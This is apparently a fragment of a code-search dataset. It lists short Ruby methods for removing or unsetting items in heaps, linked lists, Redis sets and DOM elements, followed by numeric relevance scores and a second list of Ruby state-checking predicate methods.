"def delete_state(node)\n # => Find the Node\n existing = find_state(node)\n return 'Node not present in state' unless existing\n # => Delete the Node from State\n state.delete(existing)\n # => Write Out the Updated State\n write_state\n # => Return the Deleted Node\n existing\n end",
"def remove_node(index)\n @strat.remove_node(index)\n @ize -= 1\n end",
"def unset(name)\n update(name, nil)\n end",
"def remove_midi_source(source)\n @midi.inputs.delete(source)\n end",
"def op_del(attrname = nil)\n attrname ||= pop\n push pop.dup\n peek.delete(attrname)\n end",
"def unuse(n=1)\n self.used -= n\n end",
"def remove()\n return if @store.empty?\n\n swap(0, @store.length - 1)\n banished = @store.pop\n heap_down(0)\n\n return banished.value\n end",
"def clear\n current_state.clear\n end",
"def uncheck\n self.checked = Time.at(0)\n end",
"def remove_timer_state(entry)\n timer = entry[1]\n @timers.delete entry\n @timers_time.delete timer\n\n state = remove_state(timer, State::STATE_TIMER)\n deregister_state timer if state == 0\n nil\n end",
"def remove_process!(redis, process_id)\n redis.zrem(key, process_id)\n end",
"def remove\n @instantiations.dup.each(&:remove)\n @instantiations[0..-1] = []\n true\n end",
"def remove_current_spouse\n raise_unless_current_spouse_enabled\n if gclass.perform_validation_enabled\n ex_current_spouse = current_spouse\n current_spouse.current_spouse = nil\n self.current_spouse = nil\n transaction do\n ex_current_spouse.save!\n save!\n end\n else\n transaction do\n current_spouse.update_attribute(:current_spouse,nil)\n self.update_attribute(:current_spouse,nil)\n end\n end\n end",
"def remove_token\n update(token: nil)\n end",
"def remove_house(house)\n @houses.delete(house)\n end",
"def unselect_place\n @selected_place = nil;\n end",
"def remove( *ruleses )\n self.dup.remove!( *ruleses )\n end",
"def unpad!()\n @value = unpad\n end",
"def eject!\n #removes the first node\n node = @store.first\n @store.remove(node.key)\n\n #get rid of the map's reference to the deleted node\n @map.delete(node.key)\n end",
"def deselect\n select(0, 0)\n end",
"def delete\n self.store -= self\n end",
"def remove(x, y)\n @store[x].remove(y)\n @store[y].remove(x) if undirected?\n end",
"def remove_entry(p)\n\t\t@person.delete(p)\n\tend",
"def remove_datapoint(key)\n @redis.srem \"datapoints\", key\n end",
"def remove(num)\n @count -= 1\n self[num].delete(num)\n end",
"def discard_saved_state\n execute(\"discardstate\", @uuid)\n end",
"def remove!(union_type)\n if union_type.is_singleton?\n raise AssertionError.new(\"Union type expected\")\n else\n @types.delete_if do |type|\n union_type.include?(type)\n end\n end\n end",
"def remove_connectionPoint! s\n _log { \"remove_connectionPoint! #{s.inspect}\" }\n\n @ownedMember.delete(s) # ownedElement?!?!\n @connectionPoint.delete(s)\n s.state = nil\n\n # Notify.\n s.connectionPoint_removed! self\n\n self\n end",
"def unset(event)\n key[:schedule].zrem event\n end",
"def delete_pose_index\n self.pose_words.clear if Pose.perform_search?\n end",
"def remove_phone (p)\n phone_numbers.delete_at p\n end",
"def unbind\n #@node.notifiers.unsubscribe(@notify_sid) if @notify_sid\n @node.command_connections.delete(self)\n end",
"def remove_attribute(name)\n `#@native.removeAttribute(name)`\n end",
"def !\n ~self\n end",
"def unmark!\n @session.nickserv.mark(self.name, :off)\n end",
"def clear_flag(symbol)\n @flags.delete(symbol)\n end",
"def remove_at(index)\n self.at(index - 1).next_node = self.at(index + 1)\n self.at(index).next_node = nil\n end",
"def remove\n uninstall_yri\n uninstall_yard\n end",
"def remove(type); end",
"def remove\n @store.shift\n end",
"def inline\n @out.delete(self)\n @in.each do |n|\n i = 0\n while(i < n.out.length)\n n.out[i,1] = @out if n.out[i] == self\n i += 1\n end\n end\n @graph.remove(self)\n end",
"def unset_mask\n @masking_key = nil\n end",
"def unset_mask\n @masking_key = nil\n end",
"def unuse\n @use = nil\n end",
"def unown!(owned)\r\n master_song_relationships.find_by_master_song_owned_id(owned).destroy\r\n end",
"def remove!(name)\n remove_instance_variable to_ivar(name)\n end",
"def remove(host, plataform)\n @plataforms[plataform].rem(host)\n end",
"def pin_clear\n @pinmap.each { |pin_name, pin| pin.destroy }\n @pinmap.clear\n @patternpinindex.clear\n @patternorder.delete_if { true }\n @cycletiming.clear\n 'P:'\n end",
"def remove\n unless self.empty?\n swap(0, @store.length - 1)\n removed_node = @store.pop\n\n heap_down(0)\n\n return removed_node.value\n end\n end",
"def node_remove(node)\n return unless node_present? node\n nodes.delete prepare_key(node)\n end",
"def remove!; end",
"def remove\n @nxt.prv = @prv if @nxt\n @prv.nxt = @nxt if @prv\n end",
"def clear\n @seen.clear\n return self\n end",
"def remove_sprite(tile)\n @source_sprites.delete(tile)\n end",
"def remove_from_hot_list\n self.update_attribute(:added_to_hot_list, nil)\n end",
"def remove_attribute(name)\n `#{@element}.removeAttribute(#{name})`\n end",
"def remove\n node = @head\n\n if node\n @head = node.next_node\n @tail = nil unless @head\n\n node.data\n end\n end",
"def remove()\n removed = @store[0].value\n swap(0, @store.length - 1)\n @store.pop\n heap_down(0)\n return removed\n end",
"def remove!(node)\n super\n key_to_node.delete(node.key)\n self\n end",
"def remove_topping(x)\n @toppings.delete_at(x)\n end",
"def remove()\n return if @store.empty?\n last = @store.length - 1\n curr = 0\n swap(last, curr)\n removed = @store.pop\n heap_down(curr)\n return removed.value\n end",
"def remove_statefile(path)\n key = path.sub(\"#{statefiles_root}/#{@bucket}/\",'')\n delete_empty_statefile(key)\n end",
"def removed_blip_id # :nodoc:\n @properties['removedBlipId'].dup\n end",
"def destroy\n super\n parent.unlist_item(@sym)\n end",
"def unshare!( user )\n save if unshare( user )\n end",
"def remove_property(attribute)\n `var el=this.__native__,attr=attribute.__value__,bool=c$Element.__boolean_attributes__[attr],key=c$Element.__boolean_attributes__[attr]||bool`\n `key ? el[key]=bool?false:'' : el.removeAttribute(attr)`\n return self\n end",
"def remove_player p\n (@players ||= []).delete p.sym\n end",
"def subtract_in_place(a)\n if ((a).nil?)\n return\n end\n # for all words of 'a', turn off corresponding bits of 'this'\n i = 0\n while i < @bits.attr_length && i < a.attr_bits.attr_length\n @bits[i] &= ~a.attr_bits[i]\n i += 1\n end\n end",
"def remove node\n # if the node is at beginning or end of list\n # handle this separately\n return remove_first if node.prev_node == nil\n return remove_last if node.next_node == nil\n\n # tell adjacent nodes to 'skip' over this node\n node.next_node.prev_node = node.prev_node\n node.prev_node.next_node = node.next_node\n\n # store the data, so we can return it\n data = node.data\n\n # send to garbage collector\n node.data = nil\n node = node.prev_node = node.next_node = nil\n\n @size -= 1\n\n return data\n end",
"def delete(attribute)\n `c$Element.prototype.m$remove_style.call(#{@element},attribute)`\n end",
"def delete!\n owner.delete_pin(myself)\n end",
"def setup_rem_state\n return unless PONY::ERRNO::check_sequence(current_act)\n current_action_targets.each do |target|\n state_id = @acts[1]\n chance = @acts[2] || 100\n chance = chance / 100.0 if c.integer?\n target.remove_state(state_id) if rand < chance\n end\n end",
"def unstar_note(id)\n n = ActiveMetadata::Note.find(id)\n update_note id, n.note, starred: false\n end",
"def erase\n @nodes.erase\n end",
"def remove()\n \n swap(0, @store.length - 1)\n removed = @store.pop()\n \n heap_down(0) unless @store.empty?\n \n return removed.value\n end",
"def removed(node)\n\t\t\t@size -= 1\n\t\t\treturn node\n\t\tend"
] |
[
"0.5979717",
"0.57304233",
"0.5560445",
"0.55487865",
"0.5495755",
"0.5405134",
"0.5283976",
"0.517858",
"0.5133871",
"0.50205034",
"0.5016034",
"0.5005394",
"0.4989734",
"0.49844682",
"0.49639606",
"0.49639606",
"0.4957162",
"0.49231005",
"0.49088806",
"0.4907291",
"0.4901876",
"0.4895004",
"0.48906857",
"0.48862952",
"0.4851609",
"0.4820739",
"0.4808517",
"0.47999775",
"0.47618857",
"0.4754496",
"0.47340605",
"0.47338092",
"0.47265652",
"0.47074366",
"0.46909067",
"0.46805468",
"0.46730104",
"0.46720392",
"0.46566513",
"0.4655281",
"0.46509388",
"0.46506253",
"0.46421364",
"0.463791",
"0.46333283",
"0.46303853",
"0.46267685",
"0.4625886",
"0.4624491",
"0.4623992",
"0.46206868",
"0.46160027",
"0.46155107",
"0.46090096",
"0.46079767",
"0.46049643",
"0.46041352",
"0.46022084",
"0.45948097",
"0.45916745",
"0.4590719",
"0.4579773",
"0.4576391",
"0.45760465",
"0.45749283",
"0.45736304",
"0.4570448",
"0.4570448",
"0.45675",
"0.45654142",
"0.45615342",
"0.45590678",
"0.45577243",
"0.4555285",
"0.45509636",
"0.4550716",
"0.45453498",
"0.45431122",
"0.45375124",
"0.45370623",
"0.4534309",
"0.45322156",
"0.45293316",
"0.4524288",
"0.45229962",
"0.45166796",
"0.45157367",
"0.4514776",
"0.4514467",
"0.45129284",
"0.45121977",
"0.45107323",
"0.45105094",
"0.45100147",
"0.45096412",
"0.45091748",
"0.4502276",
"0.45018318",
"0.44974202",
"0.4496583",
"0.449171"
] |
0.0
|
-1
|
Returns true if this is a start state.
|
def start_state?
@state_type == :start
end
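A minimal runnable sketch of the predicate above, assuming a state object that records its kind in @state_type; the StateNode name and the symbols used for other kinds are illustrative, not from the source:

class StateNode
  def initialize(state_type)
    @state_type = state_type # e.g. :start, :end, or any other kind
  end

  # True only for the designated start state.
  def start_state?
    @state_type == :start
  end
end

StateNode.new(:start).start_state? # => true
StateNode.new(:plain).start_state? # => false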
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def started?\n @state == STATE_STARTED\n end",
"def running?\n @state == :started\n end",
"def start?\r\n start\r\n end",
"def started?\n @started\n end",
"def started?\n @started\n end",
"def started?\n @state != :created\n end",
"def started?\n !@start_time.nil?\n end",
"def started?\n\t\tif self.timer == nil\n\t\t\treturn false\n\t\tend\n\t\treturn self.timer.status == \"--running--\"\n\tend",
"def is_start?\n type == TYPES[:start]\n end",
"def can_start?\n status.in? [Status::NOT_STARTED, Status::IN_PROGRESS]\n end",
"def start?\n @opts[:start]\n end",
"def started?\n status['Running']\n end",
"def started? # :nodoc:\n @started\n end",
"def started?\n !stopped?\n end",
"def started?\n !stopped?\n end",
"def started?\n !stopped\n end",
"def has_started?\n Time.now >= start_time\n end",
"def started?\n !self.started_at.nil?\n end",
"def started?\n !game_over? && status == Game::RUNNING && started_at.present?\n end",
"def started?\n @main_generator.started?\n end",
"def started?\n @stop.nil? ? false : !@stop\n end",
"def started?\n !@time_started.nil?\n end",
"def is_started?\n\t\treturn self.pid ? true : false\n\tend",
"def started?\n\t\t\t!@thread.nil? && @thread.alive?\n\t\tend",
"def startable?\n status.to_sym.in? [:pending]\n end",
"def start_node?\n @traversal_position.isStartNode\n end",
"def running?\n @state == :running\n end",
"def not_started?\n if self.status == self.statuses[\"Not started\"]\n return true\n end\n return false\n end",
"def started?\n @continue\n end",
"def running?\n (state == :running)\n end",
"def started?\n @worker.started?\n end",
"def started?\n @module_started\n end",
"def started?\n backend.started?\n end",
"def started?\n status == 'Running' || status =~ /Complete/\n end",
"def running?\n started? && !finished?\n end",
"def is_started\n self.set_at < DateTime.current\n end",
"def starting?\n if connection_in_info?\n status.queued? && !connect.to_h.compact.empty?\n else\n status.running? && !connect_file.file?\n end\n end",
"def start_step?\n params_hash[\"start\"]\n end",
"def running?\n @lock.synchronize { defined?(@start_time) } && !done?\n end",
"def started?\n !!@pid\n end",
"def running?\n return false if state.nil?\n \"running\".casecmp(state).zero?\n end",
"def running?\n status.running? && !starting?\n end",
"def startable?\n\t\treturn false if self.key_name.blank? || self.instance_type.blank? || self.image_id.blank? || self.security_groups.nil?\n\t\treturn true\n\tend",
"def running?\n started? && !dead?\n end",
"def initial?\n Machine[@target_class].initial_state_name == self.name\n end",
"def running?\n runtime_state?(peek_current_state)\n end",
"def started?\n started_at.present?\n end",
"def start\n true\n end",
"def running?\n @running && !@stopping\n end",
"def started?\n begin\n ping\n return true\n rescue => ex\n return false\n end\n end",
"def running_here?\n !idle? && @self_started\n end",
"def has_started?\n Date.current >= start_date\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def update_startlock?\r\n # When waiting for event execution or locked\r\n return (@starting or lock?)\r\n end",
"def start_list?\n uses_lane_assignments? || compete_in_order? || start_data_type == \"Mass Start\"\n end",
"def game_has_started?\n game.move > 0\n end",
"def can_start?\n true\n end",
"def started?\n !@pid.nil? && @pid > 0\n end",
"def for_startup?\n self.stage_id > 1\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def initiative_started?\n find_init.present?\n end",
"def flag_start?()\n return(true) if(@flags & TAC_PLUS_ACCT_FLAG_START == TAC_PLUS_ACCT_FLAG_START)\n return(false)\n end",
"def authentication_start?\n return true if (self.kind_of?(AuthenticationStart))\n return false\n end",
"def in_progress?\n if current_state =~ /\\A(started|finished|delivered)\\Z/\n true\n else\n false\n end\n end",
"def running?\n @running.true?\n end",
"def started?\n self.class.data_attributes.any?{|a| send(:\"#{a}?\")}\n end",
"def has_started?\n historic_velocity.any? do |velocity|\n velocity != 0\n end\n end",
"def help_start?\n @show_help =~ /start/i\n end",
"def perform_initial_transition?\n !current_state\n end",
"def starting?; event(:start).pending? end",
"def running?\n\t\t\t@status == :running\n\t\tend",
"def running?\n self.status == STATUS_RUNNING\n end",
"def running?\n spawned? and !@status and alive?\n end",
"def already_started?\n if started?\n ::NewRelic::Agent.logger.error('Agent Started Already!')\n true\n end\n end",
"def auto_start?\n autostart\n end",
"def start?\n @cursor == 0\n end",
"def app_starting?\n @launching\n end",
"def aasm_states_to_check\n started? || aasm_event == 'start' || ignore_states\n end",
"def is_running?\n @running\n end",
"def is_ready_to_start?\n self.is_owner? ? self.ack_get_started_owner : ack_get_started_user\n end",
"def started?\n @left_generator.started? || @right_generator.started?\n end",
"def started?\n @left_generator.started? || @right_generator.started?\n end",
"def running?\n @running\n end",
"def running?\n @running\n end",
"def running?\n @run\n end",
"def is_running?\n return @running\n end",
"def start\n @started_at ? false : @started_at = Time.now\n end",
"def is_running?\n return @running\n end",
"def start_list_present?\n if uses_lane_assignments?\n lane_assignments.any?\n elsif compete_in_order?\n order_finalized?\n elsif start_data_type == \"Mass Start\"\n wave_numbers.any?\n else\n false\n end\n end",
"def running?\n 'Running' == self.status\n end",
"def running?\n return @running\n end"
] |
[
"0.8546305",
"0.8046395",
"0.7930488",
"0.78981346",
"0.78981346",
"0.78764534",
"0.7728927",
"0.7708898",
"0.7657222",
"0.76489013",
"0.7647868",
"0.7639584",
"0.7617122",
"0.75985754",
"0.75985754",
"0.7503758",
"0.7485786",
"0.744257",
"0.74422014",
"0.74149424",
"0.7367861",
"0.73318094",
"0.7330505",
"0.7317995",
"0.7288117",
"0.7280625",
"0.7246501",
"0.7237794",
"0.7221039",
"0.7186769",
"0.7177892",
"0.71342146",
"0.7109121",
"0.709057",
"0.7086949",
"0.7040785",
"0.70310354",
"0.70263",
"0.70260966",
"0.7013254",
"0.70067036",
"0.7002907",
"0.6986708",
"0.69667524",
"0.6934591",
"0.6909198",
"0.68913966",
"0.6889794",
"0.68845147",
"0.688269",
"0.6858948",
"0.6858666",
"0.68378717",
"0.68378717",
"0.68378717",
"0.68378717",
"0.68378717",
"0.68378717",
"0.68378717",
"0.6826477",
"0.68026406",
"0.6796175",
"0.6790928",
"0.6788892",
"0.67882115",
"0.6783193",
"0.6783193",
"0.6783193",
"0.6783193",
"0.6778052",
"0.6772872",
"0.6759718",
"0.675459",
"0.67445445",
"0.6740221",
"0.67364925",
"0.67201185",
"0.6718635",
"0.6710575",
"0.6701255",
"0.66870445",
"0.6686228",
"0.668456",
"0.6677973",
"0.66778743",
"0.6676967",
"0.66754127",
"0.6663629",
"0.6662332",
"0.6654538",
"0.6654538",
"0.66488266",
"0.66488266",
"0.6643713",
"0.6641678",
"0.66370517",
"0.6628133",
"0.6616423",
"0.661293",
"0.66025865"
] |
0.91267204
|
0
|
Returns true if this is an end state.
|
def end_state?
@state_type == :end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def ended?\n\t\t\tstate == 'ended'\n\t\tend",
"def end?\n @status == :end\n end",
"def ended?\n !!@ended\n end",
"def ended?\n @ended\n end",
"def ended?\n !!@finished && !transition?\n end",
"def ended?\n return(self.ends_at < Time.now)\n end",
"def ended?\n end_time < Time.now.utc\n end",
"def final_state?\n current_state == final_state\n end",
"def ending?\n active? && !canceled_at.nil?\n end",
"def finished?\n @state == STATE_FINISHED\n end",
"def finished?\n @state == :finished\n end",
"def finished?\n sold_out? or ended?\n end",
"def finished?\n @end_time != nil\n end",
"def ended?\n ended_at.present?\n end",
"def at_end?\n peek.type == :eof\n end",
"def end?\r\n\t\tif(@allLines.empty?)\r\n\t\t\treturn true\r\n\t\telse\r\n\t\t\treturn false\r\n\t\tend\r\n\tend",
"def game_ended?\n\t\treturn @game_ended\n\t end",
"def end?()\n END_MARKER.equal? _next_element\n end",
"def terminated?\n self.state.name == \"terminated\"\n end",
"def is_end_game?\n @status= \"End\"\n return @board.over?\n end",
"def finished?\n return false unless self.started?\n return true if self.finished\n return ( self.finished_at.time <= Time.now )\n end",
"def finished?\n return false unless self.started?\n return true if self.finished\n return ( self.finished_at.time <= Time.now )\n end",
"def finished\n if (start?) and (end?)\n return true\n else\n return false\n end\n end",
"def finished?\n !!self.ended_at\n end",
"def finished?\n if self.status == self.statuses[\"Finished\"]\n return true\n end\n return false\n end",
"def animation_end?\n return false if @watch_sprite_animation.nil?\n return @watch_sprite_animation.animation_end?\n end",
"def ended?\n\t\tself.round >= self.rounds and checkedout_matches.empty? and available_matches.empty?\n\tend",
"def stopped?\n !@end_time.nil?\n end",
"def isAtEnd\n return @index >= (@actions.size - 1)\n end",
"def has_ended?\n Time.now >= end_time\n end",
"def end_of_tie?\n true\n end",
"def game_end (board)\n (horizontal_line(board) || vertical_line(board) ||\n diagonal_line(board) || full_board(board)) ? true : false\n end",
"def is_finish?\n type == TYPES[:finish]\n end",
"def game_end?\n end_game if self.age >= max_age\n end",
"def is_end?(cell)\n @end_cell.eql?(cell)\n end",
"def end?\n @cursor == @text.length\n end",
"def end?\n @cursor == @text.length\n end",
"def completed?\n @state.to_s =~ /finished|aborted|failed/\n end",
"def end?\n players.any?(&:bankrupt?)\n end",
"def last_phase?\n @finishing\n end",
"def job_ended?\n FINAL_JOB_TASK_STATUSES.include?(@task_status)\n end",
"def move_end?\n @move_end || !@start_move\n end",
"def done?\n @state == :done\n end",
"def end_state?\n not player_alive?(Player1) or not player_alive?(Player2)\n end",
"def check_end_status\n\t\t\tif @board.winning_condition?(@player) || @board.winning_condition?(@ai) ||\n\t\t\t@board.get_available_positions == []\n\t\t\t\treturn true\n\t\t\telse\n\t\t\t\treturn false\n\t\t\tend\n\t\tend",
"def end_game?\n @@cards.each do |card|\n return false if card.up == true\n end\n true\n end",
"def finished?\n\t\tif @finished.nil? then\n\t\t\tfalse\n\t\telse\n\t\t\t@finished\n\t\tend\n\tend",
"def ended?\n\t\tended = false\n\t\tended = true if(!(@fill_in_word.include? \"_\") || @guesses <= 0)\n\t\tended\n\tend",
"def terminating?\n !(status =~ /shutting/).nil?\n end",
"def terminating?\n !(status =~ /shutting/).nil?\n end",
"def terminating?\n !(status =~ /shutting/).nil?\n end",
"def closed?\n state == :closed\n end",
"def closed?\n\t\t\t\t@state == :closed || @framer.nil?\n\t\t\tend",
"def finished?\n\t\t\tif @finished.nil? then\n\t\t\t\tfalse\n\t\t\telse\n\t\t\t\t@finished\n\t\t\tend\n\t\tend",
"def finished?\n !!@finished\n end",
"def final_state?(curr_state = nil, **)\n next_state(curr_state).blank?\n end",
"def finished?\n FINAL_STATUSES.include?(transaction_status) || status == COMPLETED\n end",
"def end_element?\n @contents[0] == :end_element\n end",
"def finalized?\n self.state != STATE_NEW\n end",
"def finished?\n self.status == STATUS_FINISHED\n end",
"def complete?\n return state == \"complete\"\n end",
"def finished?\n self.closed?()\n end",
"def finished?\n true unless self.finished_on.nil?\n end",
"def termination?\n false\n end",
"def finished?\n @status[:description] == :finished\n end",
"def pairing_ended?\n end_pairing_on.nil? ? false : (end_pairing_on < DateTime.now)\n end",
"def finished?\n finished = nil\n active_item_orders = item_orders.where(active: true)\n if state_reached?(:fulfilled)\n if active_item_orders.length == 0\n finished = true\n else\n active_item_orders.each do |io|\n i = io.item\n if !i.obsolete\n last_transition = i.state_transitions.where(order_id: id).first\n\n if last_transition && (last_transition.to_state == i.final_state.to_s)\n finished = true\n else\n finished = false\n break\n end\n end\n end\n end\n end\n finished\n end",
"def exclude_end?\n @exclude_end\n end",
"def final?\n @finals.include? @state\n end",
"def end_of_stream?\n @next_chunk.nil?\n end",
"def ended\n !!(cancelled && !on_grace_period)\n end",
"def finished?\n @finished\n end",
"def finished?\n @finished\n end",
"def finished?\n @finished\n end",
"def finished?\n @finished\n end",
"def complete?\n self.state == 'complete'\n end",
"def finished?\n @step == @total_steps + 1\n end",
"def final_situation?(sit)\n if sit.index == @tape.length\n return true if @final_states.include? sit.state\n end\n false\n end",
"def finished?\n attributes['isFinished']\n end",
"def finished?\n @hand_history.last_action_on_current_street.type == :fold || ( @hand_history.actions[:river].count > 1 && ( @hand_history.last_action_on_current_street.check? || @hand_history.last_action_on_current_street.call? ) )\n end",
"def dot_is_end?\n @rule.right_tokens.count == @pos_index\n end",
"def stopped?\n @state == :stopped\n end",
"def in_progress?\n ended_at.nil?\n end",
"def halted?\n @current >= (@size - 1)\n end",
"def finished?\r\n @finished ||= false\r\n end",
"def last?\n position == bottom\n end",
"def terminated?\n !! @status\n end",
"def end?\n\t\twin?(\"x\") || win?(\"o\") || @board.count(\"-\") == 0\n\tend",
"def shutdown?\n stopped_event.set?\n end",
"def shutdown?\n stopped_event.set?\n end",
"def next_turn?\n @status != :end\n end",
"def finished?\n @finished == true\n end",
"def finished?\n current_step > 1 && current_step >= game_length + 1\n end",
"def finished?\n\n end",
"def last?\n not last.nil?\n end",
"def end?\n @color == @@colors[:red]\n end",
"def final?\n @transitions.empty?\n end",
"def finished?\n !new? && !processing?\n end",
"def terminated?\n terminated\n end",
"def finished?\n FINISHED_STATUSES.include? status or tasks_are_finished?\n end"
] |
[
"0.8354746",
"0.8338693",
"0.7862258",
"0.78419566",
"0.76578397",
"0.76541805",
"0.7490499",
"0.7454582",
"0.74293077",
"0.7343483",
"0.7333606",
"0.7327331",
"0.73170483",
"0.72842264",
"0.72469896",
"0.72145516",
"0.71146953",
"0.70591986",
"0.70328486",
"0.70161873",
"0.7010585",
"0.7010585",
"0.7003674",
"0.69983155",
"0.69717467",
"0.6966808",
"0.6909969",
"0.6900583",
"0.68997926",
"0.6883923",
"0.6877242",
"0.68699753",
"0.6864742",
"0.6846772",
"0.6838202",
"0.6818933",
"0.6818933",
"0.6815084",
"0.68099034",
"0.6800192",
"0.67992705",
"0.67915994",
"0.6776982",
"0.67608833",
"0.6757581",
"0.6727086",
"0.6725008",
"0.6721145",
"0.67118466",
"0.67118466",
"0.67118466",
"0.670774",
"0.67044926",
"0.66922694",
"0.6689732",
"0.6675322",
"0.66515636",
"0.6644576",
"0.66204464",
"0.6582603",
"0.65750796",
"0.6553048",
"0.6550124",
"0.6548626",
"0.6544328",
"0.6543217",
"0.65303546",
"0.6527878",
"0.6527785",
"0.65203124",
"0.65177166",
"0.65111196",
"0.65111196",
"0.65111196",
"0.65111196",
"0.650902",
"0.6495535",
"0.6490513",
"0.64859915",
"0.64674866",
"0.64668304",
"0.64665836",
"0.64644504",
"0.6458881",
"0.6458453",
"0.6455187",
"0.64473283",
"0.64286685",
"0.6423818",
"0.6423818",
"0.64224714",
"0.64138484",
"0.64044607",
"0.6403455",
"0.640179",
"0.63977116",
"0.6394495",
"0.6392796",
"0.6388883",
"0.6386785"
] |
0.89814514
|
0
|
Returns true if this State matches x or is a substate of x.
|
def === x
# $stderr.puts "#{self.inspect} === #{x.inspect}"
case x
when self.class
self.is_a_substate_of?(x)
else
super
end
end
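The case/when dispatch above is only meaningful next to an ancestor chain over state objects. Below is a minimal sketch under that assumption; SketchState and every name in it are hypothetical, and the x.is_a?(SketchState) test stands in for the original's `when self.class` branch:

class SketchState
  def initialize(name, superstate = nil)
    @name = name
    @superstate = superstate
  end

  # Every state is its own first ancestor, followed by its superstate chain.
  def ancestors
    @superstate ? [self, *@superstate.ancestors] : [self]
  end

  def is_a_substate_of?(x)
    ancestors.include?(x)
  end

  # Lets `case some_state; when outer ...` mean "is inside outer".
  def ===(x)
    x.is_a?(SketchState) ? x.is_a_substate_of?(self) : super
  end
end

active = SketchState.new(:active)
paused = SketchState.new(:paused, active)

case paused
when active then :inside_active # matches: paused is a substate of active
end
# => :inside_active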
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def is_a_substate_of? x\n self.ancestors.include?(x)\n end",
"def is_a_superstate_of? x\n x.ancestors.include?(self)\n end",
"def contains_x?(x)\n\t\t(self.left..self.right).include?(x);\n\tend",
"def state?(state)\n @state == state\n end",
"def in_or_after_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in and after the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def state?(state)\n @_state == state\n end",
"def state_active?(state)\n @states[state][1]\n end",
"def state?(state)\n @states.key?(state)\n end",
"def ==(x)\n self.equal? x\n end",
"def has_state?(v)\n @state[v]\n end",
"def has_state?(v)\n @state[v]\n end",
"def in_or_before_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in or before the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.reverse.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def ==(x)\n if !x.is_a?(self.class)\n false\n else\n if empty?\n x.empty?\n else\n !x.empty? && head == x.head && tail == x.tail\n end\n end\n end",
"def ==(x)\n x.class == self.class && @f == x.f && @args == x.args\n end",
"def is_state?(name)\n @state.include?(name)\n end",
"def isSubmachineState\n ! ! @submachine\n end",
"def eql?(o)\n o.class == self.class && o.state == state\n end",
"def has_state?\n !@states.empty?\n end",
"def matches_ancestors?(ancestors)\n (ancestors & matching_ancestors).any?\n end",
"def ==(o)\n o.class == self.class && o.state == state\n end",
"def ==(o)\n o.class == self.class && o.state == state\n end",
"def ==(o)\n o.class == self.class && o.state == state\n end",
"def current_state?(x, y, direction)\n @state.current_state?(x, y, direction)\n end",
"def in_state?(path)\n self.find_states(current_state.path).include? find_state(path)\n end",
"def applySupport(x)\n if ((x.minus_state_set.length > 0 || x.plus_state_set.length > 0) && \n x.base_damage == 0 && \n x.hp_recovery == 0 && x.hp_recovery_rate == 0 &&\n x.mp_recovery == 0 && x.mp_recovery_rate == 0) == @value\n return true\n else\n return false\n end\n end",
"def enemy_has_state?(id, s_id)\n # get enemies\n enemies = get_enemies(id)\n # return result\n return (enemies.any? {|e| e.states.include?(s_id)})\n end",
"def == x\n return false unless self.class === x\n @advice == x.advice && @mod == x.mod && @meth == x.meth && @kind == x.kind\n end",
"def active_ship?(ship_obj)\n @active_pos.has_value?(ship_obj)\n end",
"def same?(state)\n map[state] == state || (map[ANY_STATE] == state && from_state == state)\n end",
"def state?(name)\n @states.include?(name.to_sym)\n end",
"def has_state?(v)\n@state[v]\nend",
"def partial_matched?(node, condition)\n node.child_nodes == node.child_nodes & condition.child_nodes\n end",
"def starts_with? x\r\n self[0..x.size-1] == x\r\n end",
"def in?(x, y)\n check_x = x.between?(self.x, self.x+self.width)\n check_y = y.between?(self.y, self.y+self.height)\n check_x && check_y\n end",
"def == other\n self.class == other.class && self.state == other.state\n end",
"def == other\n self.class == other.class && self.state == other.state\n end",
"def == other\n self.class == other.class && self.state == other.state\n end",
"def sub_branch?\n !root?\n end",
"def matches_ancestors?(ancestors); end",
"def member_of?(team)\n self.team == team\n end",
"def ==(x)\n x.class == self.class && @table == x.table\n end",
"def contained?(other); end",
"def contained?(other); end",
"def contained?(other); end",
"def needs_playing?\n # if either both children are matches and they both need relevant\n # OR\n # both children are players and both are present\n children.count {|child| child.is_a?(Match) ? child.relevant? : child.present?} == 2\n end",
"def ==(other)\n other.class == self.class && other.state == state\n end",
"def solution_for?(puzzle)\n solution? and puzzle.subset?(self)\n end",
"def child_of?(residue)\n residue.residue_composition.include?(self)\n end",
"def current_state?(state)\n state == current_state.to_sym\n end",
"def contains_x(x)\n\t\t@x <= x && x <= (@x + @bg_width)\n\tend",
"def contains(x, y)\n\t\tcontains_x(x) && contains_y(y)\n\tend",
"def has_state(name)\n !@_possible_states[name].nil?\n end",
"def check(type, name, state_to_check)\n key = (make_key(type, name))\n entry = @state[key]\n return entry.state == state_to_check if entry\n false\n end",
"def state_resist?(state_id)\r\n state_resist_set.include?(state_id)\r\n end",
"def state_meets_requirements?\n @needs.each do |requirement|\n valid, reason = state.meets_requirement?(requirement)\n\n unless valid\n logger.debug(\"State does not meet the requirements %s: %s\" % [self, reason])\n return false\n end\n end\n\n true\n end",
"def exists_and_active?\n exists? and active?\n end",
"def washington_state_resident?\n resident == 1 || resident == 2\n end",
"def include?(x)\n inf <= x && x <= sup\n end",
"def has_state?\n !!current_state\n end",
"def sub? name\n @subs.include? name\n end",
"def selected_by_subnav?\n sub_navigation && sub_navigation.selected?\n end",
"def equals(state)\n @buckets == state.buckets &&\n @goal == state.goal\n end",
